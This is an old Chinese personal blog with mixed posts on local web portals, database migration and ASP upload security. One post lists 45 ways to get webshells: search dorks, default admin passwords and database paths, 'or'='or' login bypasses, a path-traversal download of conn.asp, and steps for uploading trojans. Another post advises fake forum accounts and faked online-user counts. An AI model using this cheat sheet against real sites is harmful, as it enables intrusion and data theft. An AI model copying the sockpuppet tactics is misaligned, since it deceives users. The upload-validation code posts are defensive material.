梦情轩-Richard's Blog|

新生儿

2008-09-11T00:09:21+08:00

在网络社会的大家庭里，我绝对是个新生儿：也许你一定对我很好奇，也许你也对我很不在意。但当你走进我的内心世界，真正的了解了我能为大家做什么的时候，你一定不会再用奇怪和轻视的眼光来看我。

我是新生儿，但是我的本领却是与生具来的。不信？请看……

你想知道哪里有本地最新的房产信息吗？

你想知道哪里有本地最多最好吃的特产吗？

你想知道哪里有最新最流行的时尚吗？

你想知道哪里有本地最全的商务服务信息吗?

你想知道哪里有本地最全最及时的生活服务信息吗?

甚至你还想知道哪里能找到在其它网络不能找到的信息吗?

那一切都不再难。

请跟我来，走进我的内心世界吧，在这里我将满足你所需要的需要。

想你所想，急你所急……我每天都在长大，每天都在进步。

荣昌网 http://www.rc369.com.cn

原创文章,版权所有,转载请注明出处作者.

网站备案客户须提供的基本资料

2008-09-03T18:22:53+08:00

以公司形式备案需提供：
公司全称营业执照或者代码证号码负责人全名身份证号码手机固定电话邮箱联系地址营业执照和税务登记证复印件

以个人形式备案需提供：
全名身份证号码手机固定电话邮箱联系地址身份证复印件

就这样结束了！

2008-08-18T11:49:32+08:00

几年的感情一瞬间就没了，说得那样自然，冷酷。完全变了一个人似的，没有任何的留恋。决绝，是你的一抹血，带着杀手的寒意，虽然你知道对方的好，可如忍者一般，不带感情，或者本没有感情。突然，太突然，没有暴风雨的前兆，你就一个人作出了这个决定！其实你真的太小了，或者你追求的生活应该是跌宕起伏的，充满名利的天堂。走吧！走得干脆一点！不要让我产生恨，由爱生恨，毕竟我不能欺骗我的心，把痛咬出血来，让痛产生麻痹，产生免疫力。一路走好，希望你在以后的生活中生活得更好！此情待追忆，往事皆成空！

做地方门户三条锦囊妙计

2008-08-12T14:51:52+08:00

第一条:打感情牌,让网友的感情共同回归

地方性综合门户网站,地域优势明显,聚扰心强.也有种中国传统意义上的家族意识的感觉.因此,一个成功的地方门户网站,绝不能丢失”家乡”,”乡土”,”外地的家乡人”,”今日的家乡”,”老乡”,”想家”,”家乡的发展”,”游子”等关键词,这些关键词并不是让你去做SEO,而是让你想办法如何很巧妙的运用到地方门户网站的每个角落,当然每个人的用法不同.你可以把他运用到网站的栏目的设置里,你也可以把他运用到高聚集人气的地方论坛里.说到这里做地方站的朋友们是不是有一种似曾相识的感觉呢?

相信大家一点就通了.操作的手段:一是开设本地新闻,本地名人,在外的家乡人,家乡风景,家乡的人文,本土的文学等栏目,二是建设本地论坛,在论坛中设置,游子情深,聚集故乡等版块.让同乡人写下在他乡漂泊的日子的心情文章,以及在外相家的感觉,还有定期的讨论家乡的发展变化以及家乡的焦点问题,你做为论坛的管理者,当然要很会运用新闻炒作和新闻敏感这两种手段,在论坛刚建立起来,你要注册多个马甲,定期的发表一些家乡的能吸引眼球观点和看法.以引起网友共鸣的参与性.你也可利用技术手段,把论坛的在线人数弄成虚拟的.在论坛中当然不能千篇一律的设置成本地的版块,还要设一些辅助性的,娱乐性的版块,比如原创文学,灌水区,原创贴图,音乐等版块.以达到像SEO中所讲的蜘蛛效应.三是建立老乡小圈子,首页下面一定要加上本地QQ群号.四是留下站长的联系方式,比如QQ号,邮箱,手机.有益于别人认识你,找到你.五是认真耐心做好一个客服小姐.如果你是位男站长,你要把自己当成温柔的客服小姐一样,耐心的回答网友的问题,哪怕是你心里感觉很讨厌的问题你都要一一回答.这有益于建立口碑营销,千万别呼视每一位网友的作用,要把每一个网友当成自己的上帝.

第二条,吸纳英雄好汉,加强联络,各显本领,逼上梁山聚义.

这也是一种手段,这第一条妙计和上一条多多少少有关联的,我们通过打感情牌可以聚了一定的人气,这些人中,当然也有才华横溢的人,他们有的可能在外面很成功,我就通过我的地方站,认识了一些高人,比如有在外面当官的,做生意成功的,在文化艺术方面也很成功的,也有在体育方面成功的家乡人.这些人长期在外面生活,想家的意念是很深的,他们往往修养和素质各个方面都很优秀,和他们交流的时侯,一定要谦虚.我一般就会说,感谢你对本站的支持和厚爱,我也和你一样热爱家乡等话.时间长了,和他们建立友好的朋友关系,力所能及的为他们做一些事,比如有的在外的家乡人,就会说,你去我老家拍一些照片,我想看看,千万别嫌麻烦,你可以找在某个乡上网的网友,委托网友采拍照片,或者你有时间去一下他的家里,拍一下.就当是旅游了.还有的会说,你帮我寻找一下同学或朋友或亲戚,你一定要免费大力的给发布消息,不管能不能达到效果,你这样去做.这样子,当你有麻烦事情的时侯,他们会帮助上你,做为我们站长,一般要与空间商,公安局,电信部门,工商局等打交道,如果你认识了一个当官的朋友,在办理一些事情上就很方便了,本身很难办的事情,他打一个电话,就会很轻松的.在你的网站上你可以展示他们的摄影作品,他们的文学作品,你也可以寻找当地的一些文化名人合作,合作的方式就是,宣传他们的作品,帮助他们出售作品.当然你接触他们的时侯他要有手段呀,可以托关系,一般这些文化人都清高,自认为很了不起,你如果直接找他,他会拒你门之外,你可以通过他的朋友先把他的作品放到你的网站上展示,然后再登门拜访,进门后直呼他为老师,你就说,我看到你的作品很好,作品处处展露出了对家乡的热爱和歌颂,你是个好人,你是个热爱家乡的人.此次来有两个目的,

第一是通过您的知名度,宣传家乡。

第二,想请您给我的网站题个词或做个画.

一般情况下他们都很乐意.必竟他们是本地的小名人,这些人一般都是四十几岁的人,他们不懂网络,你就说你的地方门户站的知名度和好处.当然要含虚的吹捧自己的网站有多牛比.如果你得到他们的墨宝或作品,你就大力的在网站炒作,你就说著名的某某某为本站题词,这样就达到了名人效应,一般像我们这些小站长和明星都接触不上的,只能想这些招了.你像写诗或写文章好的一些小名人,你可以把他的诗或文章放到你网站的本土文学栏目里,把他们的简介和作品放到本地名人栏目里,像书法家,画家,都可以归到本地名人栏目里,除过这几类,像建筑设计师,德高望重的宗教人士,武术家,体育工作者,教师,科研贡献者,演员,歌唱者,政治家,等一些在平凡的岗位上做出不平凡业绩的人你都可以放到本地名人里,因为他们确实做出了贡献,但你一定要在网站上注明,本网的本土名人栏目,是实打实的展示为家乡的发展做出不平凡业绩的人,请无聊者勿借此炒作或捕风捉影.这样有利于保护自已和本土的名人.不光要在本地真实的寻找和挖掘这些名人,还要在网上搜索你们当地从古到今出的大名人.如果你和这些大名人真正的联系上了,那你的网站也就有了内容和光泽了。

ASP+Access转化成ASP+MS SQL

2008-07-26T18:10:31+08:00

当你找到一台装有SQLSERVER的机器时，你便可以开始转换并调试了。

1。先利用转化软件：CooSel2.0 CreateSQL V1.05，我用的这个，非常好用。具体操作的话，我用的是生成升迁SQL脚本，保存为 *.sql文件后，在SQL2000的查询分析器里调入执行。而SQLSERVER的具体操作在此不便赘述。这样，你的数据库就转化成了MSSQL数据库

2。对asp而言，首先是数据库连接文件的修改：这点可以参考动网论坛的conn.asp

Dim ConnStr
'sql数据库连接参数：数据库名、用户密码、用户名、连接名（本地用local，外地用IP）
Dim SqlDatabaseName,SqlPassword,SqlUsername,SqlLocalName
SqlDatabaseName = "dvbbs7" '数据库名称
SqlPassword = "" '数据库密码
SqlUsername = "dvbbs" '数据库用户名
SqlLocalName = "(local)"
ConnStr = "Provider = Sqloledb; User ID = " & SqlUsername & "; Password = " & SqlPassword & "; Initial Catalog = " & SqlDatabaseName & "; Data Source = " & SqlLocalName & ";"
On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr

即只需要修改数据库名称、用户名和密码即可覆盖原来的ACCESS连接方法并使用。如果你的网站同时包含了动网论坛，则可根据1。的操作将动网的数据库也转换成SQLSERVER，值得称道的是：动网考虑了ACCESS和SQLSERVER两种数据库的使用，因此在修改ASP源代码的时候不需要对动网的源代码进行更改，可谓方便至极，考虑得十分周全~~

3。这时候你可以先浏览一下新的网站了，如果出错了，也不用担心，但是有很多页面已经是可以正常显示了。接着就是对整站程序的修改了。尤其要注意的是：所有的修改都只针对对数据库进行操作的语句，几乎全是对SQL语句的修改。而在一般的代码中是绝对不需要修改的!否则会出错!!

4。真假值的判断。ACCESS提供了布尔值这一数据类型，但是在SQLSERVER中，如果你在SQL语句中填写Where AA=True则是错误的，因为MSSQL不支持在数据库中True和False的判断。这时候你需要将所有SQL语句中的True和False改为1和0。而在一般的程序中，例如rs("aa")=True则不需要修改!因为这句话并不是对数据库的操作。可能你会说这样改起来，对于大网站而言，是非常麻烦的，的确，但有一些比较简便的方法。比如在dreamweaver中，你可以利用整个文件夹的查找，找出所有的True和False，然后筛选出对数据库进行操作的True和False并将他们改成1和0。另外还有一点：在SQLSERVER中也需要更改一下，ACCESS转化后布尔值变成了Bit值，最好将默认值设为0，即与ACCESS一样设置默认值为False。

5。有一些网站中提到：sql数据库表是没有自动字段的，因此原来access中的自动字段被转换成了普通字段，需要手工改成标识类型，增量为1。这点其实软件在转化的过程中已经帮你完成了，如果你是手工转化的话，确实需要修改标识类型。还有一点我没有遇到过，但是有的网站也提到了：空值的表示：在access中，判断空值一般用是否＝""来表示，但是这在SQL中往往出错，如果遇到出错的问题或者程序运行不正常，可以改成如这样判断：where (name is null)。

6。如果你在SQL语句中同时使用了VB函数，很遗憾，这在MSSQL中是不能被辨认的，最好的方法是先将他在SQL之外处理，然后存入变量中导入到SQL语句中。

7。最主要的还是时间函数的各种修改，这占到了工作量的90%。其一是将所有数据库操作语句中的NOW()转化成GETDATE()；其二是datediff和dateadd这类函数需要将第一项中的引号去掉，即datediff("s",date1,date2)改为datediff(s,date1,date2)；其三，ACCESS中时间字符串都用#括起来，而MSSQL中是用''来表示的，即等同于一般的字符串；其四有一些时间函数在MSSQL中是不能被辨认的，基本上所有的SQLSERVER中的时间日期函数如下：

day(), month(), year()
dateadd(datepart, number, date), datapart指定对那一部分加，number知道加多少，date指定在谁的基础上加。datepart的取值包括，year,quarter,month,dayofyear,day,week,hour,minute,second,比如明天dateadd(day,1, getdate())
datediff(datepart,date1,date2). datapart和上面一样。整个函数结果是date2 - date1
datename(datepart, date) 取那一部分，返回字符串。
datepart(datepart, date) 取一部分，返回整数。
getdate()当前时间

逍遥网店所有版本后台数据备份漏洞收藏程序代码

2008-07-24T18:49:29+08:00

bordercolor="#333333" cellspacing="0" cellpadding="2">

数据库在线维护
从未备份数据库文件

※提示：

此操作需FSO功能支持。

执行此操作前，请先关闭其它网页窗口，断开FTP连接。

提交后，请耐心等待（请不要重复点击上面的按钮），完成时间视网络状况而定。

请在网络空闲时进行此操作，执行此操作可能导致服务器变慢或不稳定。

45种可以拿到Webshell的程序总结

2008-07-24T18:48:04+08:00

1,
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆

4,
关键字：Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'

5.
动感购物系统
inurl:help.asp登陆，如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞

6。
默认数据库地址blogdata/acblog.asa
关键字：acblog

7.
百度 /htdocs
注册里可以直接上传asa文件！

8.
/Database/#newasp.mdb
关键词：NewAsp SiteManageSystem Version

9.
用挖掘机
关键字：Powered by WEBBOY
页面：/upfile.asp

10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

11.
Upfile_Article.asp bbs/upfile.asp
输入关键字：powered by mypower ，

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp

14.
键字：首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛

挖掘鸡的关键字添 setup.asp

15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了

16.
1.打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cart
open source。这是一个商场系统。
2.网站的最底部分，有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。
那样把前一个''store/''除去，再加上database/comersus.mdb 试试

17.
无忧传奇官方站点程序。
1、后台管理地址：http://您的域名/msmiradmin/
2、默认后台管理帐号：msmir
3、默认后台管理密码：msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp

18.
百度里输入/skins/default/

19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞工具使用

20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp

21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码，软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如：#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
注射漏洞
百度搜索:oioj's blog

24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'

26.
入侵魔兽私服
需要的工具：ASP木马一只。
Domain3.5明小子
关键字：All Right Reserved Design:游戏联盟
后台地址：admin/login.asp
数据库的地址：chngame/#chngame.mdb

27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp

28.
国外站的爆库漏洞
关键字：sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"

30.
关键字：尚奈克斯
后台路径/system/manage.asp
直接传ASP木马

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能，否则您将不能登录
插入diy.asp

32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

33.
工具: 挖掘机辅臣数据库读取器
关键字: 企业简介产品展示产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到在 config.asp内。

35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径

36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'

37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp

38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.

39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字：asp?id=1 gov.jp/ asp?id=
页数：100
语言：想入侵哪个国家就填什么语言吧

41.
关键字：Powered by:94KKBBS 2005
利用密码找回功能找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录　进入
默认数据库地址:Database/DataShop.mdb

43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻在标题输入我们的一句话木马

44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字：程序核心：BJXSHOP网上开店专家
后台:/admin

图片上传木马检测

2008-07-23T14:47:43+08:00

图片上传木马检测

经常听说的ASP上传漏洞，即是将一些木马文件修改后缀名（修改为图像文件后缀），进行上传。
针对此情况使用下列函数进行辨别：
<%
'***************************************************************
'CheckFileType 函数用来检查文件是否为图片文件
'参数filename是本地文件的路径
'如果是文件jpeg,gif,bmp,png图片中的一种，函数返回true，否则返回false
'***************************************************************
const adTypeBinary=1
dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8)
dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D)
dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H47)
dim gif(5):gif(0)=CByte(&H47):gif(1)=CByte(&H49):gif(2)=CByte(&H46):gif(3)=CByte(&H39):gif(4)=CByte(&H38):gif(5)=CByte(&H61)
function CheckFileType(filename)
on error resume next
CheckFileType=false
dim fstream,fileExt,stamp,i
fileExt=mid(filename,InStrRev(filename,".")+1)
set fstream=Server.createobject("ADODB.Stream")
fstream.Open
fstream.Type=adTypeBinary
fstream.LoadFromFile filename
fstream.position=0
select case fileExt
case "jpg","jpeg"
stamp=fstream.read(2)
for i=0 to 1
if ascB(MidB(stamp,i+1,1))=jpg(i) then CheckFileType=true else CheckFileType=false
next
case "gif"
stamp=fstream.read(6)
for i=0 to 5
if ascB(MidB(stamp,i+1,1))=gif(i) then CheckFileType=true else CheckFileType=false
next
case "png"
stamp=fstream.read(4)
for i=0 to 3
if ascB(MidB(stamp,i+1,1))=png(i) then CheckFileType=true else CheckFileType=false
next
case "bmp"
stamp=fstream.read(2)
for i=0 to 1
if ascB(MidB(stamp,i+1,1))=bmp(i) then CheckFileType=true else CheckFileType=false
next
end select
fstream.Close
set fseteam=nothing
if err.number<>0 then CheckFileType=false
end function
%>

那么在应用的时候
CheckFileType(server.mappath("cnbruce.jpg"))
或者
CheckFileType("F:/web/164/images/cnbruce.jpg"))
反正即是检测验证本地物理地址的图像文件类型，返回 true 或 false值
所以这个情况应用在图像上传中，目前的办法是先允许该“伪图像”文件的上传，接着使用以上的自定义函数判断该文件是否符合图像的规范，若是木马伪装的图像文件则FSO删除之，比如：
file.SaveAs Server.mappath(filename) '保存文件
If not CheckFileType(Server.mappath(filename)) then
response.write "错误的图像格式"
Set fso = CreateObject("Scripting.FileSystemObject")
Set ficn = fso.GetFile(Server.mappath(filename))
ficn.delete
set ficn=nothing
set fso=nothing
response.end
end if

则是先将文件上传，接着立马使用自定义函数判断文件图像类型的吻合性，FSO做出删除该文件的操作。

ASP上传漏洞还利用"\0"对filepath进行手脚操作www.cnbruce.com/blog/showlog.asp?cat_id=32&log_id=635
针对这样的情况可使用如下函数
function TrueStr(fileTrue)
str_len=len(fileTrue)
pos=Instr(fileTrue,chr(0))
if pos=0 or pos=str_len then
TrueStr=true
else
TrueStr=false
end if
end function

接着就可判断后再做文件的上传
if TrueStr(filename)=false then
response.write "非法文件"
response.end
end if
file.SaveAs Server.mappath(filename)

所以，在Blog中的一文：（ASP）文件系统之化境无组件（v2.0）上传
http://www.cnbruce.com/blog/showlog.asp?cat_id=26&log_id=927
关于upfile.asp的全新内容如下：

--------------------------------------------------------------------------------
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>

文件上传

<%
on error resume next
dim upload,f_folder,file,formPath,iCount,filename,fileExt,filesizemin,filesizemax
'******************************************************************
'CheckFileType 函数用来检查文件是否为图片文件
'参数filename是本地文件的路径
'如果是文件jpeg,gif,bmp,png图片中的一种，函数返回true，否则返回false
'******************************************************************
const adTypeBinary=1
dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8)
dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D)
dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H47)
dim gif(5):gif(0)=CByte(&H47):gif(1)=CByte(&H49):gif(2)=CByte(&H46):gif(3)=CByte(&H39):gif(4)=CByte(&H38):gif(5)=CByte(&H61)
function CheckFileType(filename)
CheckFileType=false
dim fstream,fileExt,stamp,i
fileExt=mid(filename,InStrRev(filename,".")+1)
set fstream=Server.createobject("ADODB.Stream")
fstream.Open
fstream.Type=adTypeBinary
fstream.LoadFromFile filename
fstream.position=0
select case fileExt
case "jpg","jpeg"
stamp=fstream.read(2)
for i=0 to 1
if ascB(MidB(stamp,i+1,1))=jpg(i) then CheckFileType=true else CheckFileType=false
next
case "gif"
stamp=fstream.read(6)
for i=0 to 5
if ascB(MidB(stamp,i+1,1))=gif(i) then CheckFileType=true else CheckFileType=false
next
case "png"
stamp=fstream.read(4)
for i=0 to 3
if ascB(MidB(stamp,i+1,1))=png(i) then CheckFileType=true else CheckFileType=false
next
case "bmp"
stamp=fstream.read(2)
for i=0 to 1
if ascB(MidB(stamp,i+1,1))=bmp(i) then CheckFileType=true else CheckFileType=false
next
end select
fstream.Close
set fseteam=nothing
if err.number<>0 then CheckFileType=false
end function
function TrueStr(fileTrue)
str_len=len(fileTrue)
pos=Instr(fileTrue,chr(0))
if pos=0 or pos=str_len then
TrueStr=true
else
TrueStr=false
end if
end function
filesizemin=100
filesizemax=200*1024
set upload=new upload_5xSoft '建立上传对象
f_folder=upload.form("upfilefolder")
'********************************列出所有上传文件***************************************************
For each formName in upload.objFile
set file=upload.file(formName)
If file.filesize>0 then
'********************************检测文件大小***************************************************
If file.filesizeresponse.write "你上传的文件太小了　[ 重新上传 ]"
ElseIf file.filesize>filesizemax then
response.write "文件大小超过了 "&filesizemax&"字节限制　[ 重新上传 ]"
End If
'********************************检测文件类型****************************************************
fileExt=ucase(right(file.filename,4))
uploadsuc=false
Forum_upload="RAR|ZIP|SWF|JPG|PNG|GIF|DOC|TXT|CHM|PDF|ACE|MP3|WMA|WMV|MIDI|AVI|RM
|RA|RMVB|MOV|XLS"
Forumupload=split(Forum_upload,"|")
for i=0 to ubound(Forumupload)
if fileEXT="."&trim(Forumupload(i)) then
uploadsuc=true
exit for
else
uploadsuc=false
end if
next
if uploadsuc=false then
response.write "文件格式不正确　[ 重新上传 ]"
response.end
end if
'********************************建立文件上传的目录文件夹****************************************
Set upf=Server.CreateObject("Scripting.FileSystemObject")
If Err<>0 Then
Err.Clear
response.write("您的服务器不支持FSO")
response.end
End If
f_type= replace(fileExt,".","")
f_name= year(now)&"-"&month(now)
If upf.FolderExists(Server.MapPath(f_folder&"/"&f_type&"/"&f_name))=False Then
If upf.FolderExists(Server.MapPath(f_folder&"/"&f_type))=False Then
If upf.FolderExists(Server.MapPath(f_folder))=False Then
upf.CreateFolder Server.MapPath(f_folder)
upf.CreateFolder Server.MapPath(f_folder&"/"&f_type)
upf.CreateFolder Server.MapPath(f_folder&"/"&f_type&"/"&f_name)
Else
upf.CreateFolder Server.MapPath(f_folder&"/"&f_type)
upf.CreateFolder Server.MapPath(f_folder&"/"&f_type&"/"&f_name)
End If
Else
upf.CreateFolder Server.MapPath(f_folder&"/"&f_type&"/"&f_name)
End If
End If
f_ftn=f_folder&"/"&f_type&"/"&f_name
Set upf=Nothing
'********************************保存上传文件至文件夹*****************************************
randomize
ranNum=int(90000*rnd)+10000
filename=f_ftn&"/"&day(now)&"-"&ranNum&"-"&file.filename
if TrueStr(filename)=false then
response.write "非法文件"
response.end
end if
if file.filesize>filesizemin and file.filesizefile.SaveAs Server.mappath(filename) '保存文件
If not CheckFileType(Server.mappath(filename)) then
response.write "错误的图像格式"
Set fso = CreateObject("Scripting.FileSystemObject")
Set ficn = fso.GetFile(Server.mappath(filename))
ficn.delete
set ficn=nothing
set fso=nothing
response.end
end if
if f_type="JPG" or f_type="GIF" or f_type="PNG" then
response.write ""
ElseIf f_type="ZIP" or f_type="RAR" or f_type="DOC" or f_type="TXT" then
response.write ""
'ElseIf
else
response.write ""
end if
iCount=iCount+1
end if
set file=nothing
end if
next
set upload=nothing '删除此对象
response.write (iCount&" 个文件上传成功! 继续上传")
%>

同心

2008-07-23T08:27:33+08:00

把岁月锁进心房
藏在最深处
不让阳光捕获
不让月光窥视
只让你－－心中的倩影
与我共享

修补upfile.asp上传漏洞

2008-07-21T19:57:39+08:00

ASP文件相关的一些函数。有以下几个：
1. 得到文件扩展名
2. ASP上传文件漏洞检测
3. 格式化显示文件大小
4. asp检测上传图片是否为真实图片
5. 上传文件扩展名检测
6. 取得文件对应的图标
7. 下载文件等相关函数

程序代码：

<%
      '*******************************************************
      '作    用: 得到文件扩展名
      '函数名: GetFileExt(fileTrue)
      '参    数: sFileName 文件名
      '返回值: 返回文件扩展名
      '*******************************************************
      function GetFileExt(sFileName)
           GetFileExt = UCase(Mid(sFileName,InStrRev (sFileName, ".")+1))      '下面有附
      End function


      '*******************************************************
      '作    用: ASP上传漏洞 "\0" 防范
      '函数名: TrueStr(fileTrue)
      '参    数: sFileName 文件名
      '返回值: 合法文件返回 True ,否则返回False
      '*******************************************************
      function IsTrueFileName(sFileName)
          dim str_len,pos
          str_len=len(sFileName)
          pos=Instr(sFileName,chr(0))
          If pos=0 or pos=str_len then
              IsTrueFileName = true
          else
              IsTrueFileName = false
          End If
      End function


      '*******************************************************
      '作    用: 检测上传的图片文件(jpeg,gif,bmp,png)是否真的为图片
      '函数名: TrueStr(fileTrue)
      '参    数: sFileName 文件名(此处文件名是文件夹的物理全路径)
      '返回值: 确实为图片文件则返回 True ,否则返回False
      '*******************************************************
      function IsImgFile(sFileName)
          const adTypeBinary=1
          dim return
          dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8)
          dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D)
          dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H47)
          dim gif(5):gif(0)=CByte(&H47):gif(1)=CByte(&H49):gif(2)=CByte(&H46):gif(3)=CByte(&H39):gif(4)=CByte(&H38):gif(5)=CByte(&H61)

          on error resume next

          return=false
          dim fstream,fileExt,stamp,i
          '得到文件后缀并转化为小写
          FileExt = LCase(GetFileExt(sFileName))
          '如果文件后缀为 jpg,jpeg,bmp,gif,png 中的任一种
          '则执行真实图片判断
          If strInString(FileExt,"jpg|jpeg|bmp|gif|png")=true then
              Set fstream=Server.createobject("ADODB.Stream")
              fstream.Open
              fstream.Type=adTypeBinary
              fstream.LoadFromFile sFileName
              fstream.position=0
              select case LCase(FileExt)
              case "jpg","jpeg"
                  stamp=fstream.read(2)
                  for i=0 to 1
                      If ascB(MidB(stamp,i+1,1))=jpg(i) then return=true else return=false
                  next
              case "gif"
                  stamp=fstream.read(6)
                  for i=0 to 5
                      If ascB(MidB(stamp,i+1,1))=gif(i) then return=true else return=false
                  next
              case "png"
                  stamp=fstream.read(4)
                  for i=0 to 3
                      If ascB(MidB(stamp,i+1,1))=png(i) then return=true else return=false
                  next
              case "bmp"
                  stamp=fstream.read(2)
                  for i=0 to 1
                      If ascB(MidB(stamp,i+1,1))=bmp(i) then return=true else return=false
                  next
              End select

              fstream.Close
              Set fseteam=nothing
              If err.number<>0 then return = false
          else
              return = true
          End If
          IsImgFile = return
      End function

      '*******************************************************
      '作    用: 上传文件扩展名检测
      '函数名: CheckFileExt
      '参    数: sFileExt 上传文件夹的后缀
      '          strExt     允许或禁止上传文件夹的后缀,多个以"|"分隔
      '          blnAllow 是允许还是禁止上传 strExt 中指定的后缀
      '返回值: 合法文件返回 True ,否则返回False
      '*******************************************************
      Function CheckFileExt(sFileExt,strExt,blnAllow)
          dim arrExt,return
          '= 禁止上传的文件列表
          'strExt = "EXE|JS|BAT|HTML|HTM|COM|ASP|ASA|DLL|PHP|JSP|CGI"
          sFileExt = UCase(sFileExt)
          strExt     = UCase(strExt)
          arrExt = split(strExt,"|")
          If blnAllow=true then           '只允许上传指定的文件
              return = false
              for i=0 to UBound(arrExt)
                  If sFileExt=arrExt(i) then return=true
              next
              'response.write "Ext: "&sFileExt & " return: " & return & "     "
          else                          '禁止上传指定的文件
              return = true
              for i=0 to UBound(arrExt)
                  If sFileExt=arrExt(i) then return=false
              next
          End If
          CheckFileExt = return
      End Function


      '*******************************************************
      '作    用: 格式化显示文件大小
      'FileSize: 文件大小
      '*******************************************************
      Function FormatSize(FileSize)
          If FileSize<1024 then FormatSize = FileSize & " Byte"
          If FileSize/1024 <1024 And FileSize/1024 > 1 then
              FileSize = FileSize/1024
              FormatSize=round(FileSize*100)/100 & " KB"
          Elseif FileSize/(1024*1024) > 1 Then
              FileSize = FileSize/(1024*1024)
              FormatSize = round(FileSize*100)/100 & " MB"
          End If
      End function


      '*******************************************************
      '作    用: 取得文件对应的图标
      '函数名: FormatSize(FileSize)
      '参    数: FileName 文件名
      '返回值: 合法文件返回 True ,否则返回False
      '*******************************************************
      Function GetFileIcon(FileName)
          dim FileExt,Fso1
          FileExt = GetFileExt(FileName)
          ImgPath= strAdminRoot &    "Style/images/file/" & FileExt & ".gif"
          Set Fso1 = Server.CreateObject("Scripting.FileSystemObject")
          If Fso1.fileExists(server.MapPath(ImgPath))=true then
              GetFileIcon= ""
          else
              GetFileIcon= ""
          End If
          Set Fso1=nothing
      End Function

      '*******************************************************
      '作用：下载文件。
      '函数名： DownFile(FileName)
      ' FileName
      '*******************************************************
      Sub DownFile(FileName)
        fname = server.MapPath(fname)
        filename=split(fname,"\")

        Set objAdoStream=Server.createObject("ADODB.Stream")
